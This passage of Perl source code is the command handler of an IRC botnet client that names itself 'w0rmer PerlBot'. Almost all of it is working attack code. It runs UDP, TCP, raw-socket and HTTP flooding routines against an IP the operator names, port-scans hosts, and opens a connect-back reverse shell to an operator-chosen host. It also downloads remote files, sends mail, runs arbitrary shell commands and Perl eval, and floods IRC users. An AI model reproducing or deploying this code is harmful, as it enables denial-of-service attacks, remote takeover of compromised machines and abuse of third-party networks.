sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ProcessPID : 12$$ ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ID : 12$id ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Own Dir : 12$ownd ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
}
if ($funcarg =~ /^version/){
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1Bot Informations: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Version : 12$version ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Creator 0rmer ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Year : 122012 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
}
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Flood Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^channel/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Channel Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1join <channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1part <channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1rejoin <channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1op <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1deop <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1voice <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1devoice <channel> <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1nick <newnick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1msg <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1quit ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1die ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
}
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Utils Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
}
#########################
##### [ Functions ] #####
#########################
if ($funcarg =~ /^die/) {
sendraw($IRC_cur_socket, "QUIT :");
$killd = "kill -9 ".fork;
system (`$killd`);
}
###########
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
###########
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Scanning for open ports on 12".$1." 9,1started. ");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Open ports found: 12@aberta ");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1No open ports found. ");
}
}
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");
}
##############
if ($funcarg =~ /^dns\s+(.*)/){
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) {
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
}
}
##############
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $dtime = "$3";
my $pacote;
my $pacotese;
my $size = 0;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 w0rmer] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($dtime != "0"));
$pacote = $size ? $size : int(rand(1024-64)+64) ;
$porta = int(rand 65000) +1 if ($porta == "0");
#send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 w0rmer] 9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
}
##############
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 w0rmer] 9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 w0rmer] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^udp3\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $dtime = "$3";
my $pacote;
my $pacotese;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 w0rmer] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($dtime != "0"));
$pacote= $rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 w0rmer] 9,1Results 12".$pacotese." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
##############
##############
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [TCP w0rmer] 9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP w0rmer] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
##############
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[HTTP w0rmer] 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [HTTP w0rmer] 9,1Attacking ended on: 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $port = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [ConnectBack] 9,1Connecting to 12$host:$port ");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
##############
if ($funcarg =~ /^ctcpflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Flooding: 12".$target." ");
for (1..10) {
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
}
}
##############
if ($funcarg =~ /^msgflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1MSG Flooding: 12".$target." ");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
if ($funcarg =~ /^noticeflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1NOTICE Flooding: 12".$target." ");
for (1..2){
sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
}
##############
##############
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^newerver\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", "6667");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^join\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^part\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^quit/) {
quit();
}
}
##############
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
} elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
##############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
##############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
##############
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
}
###################
##### [ EOF ] #####
###################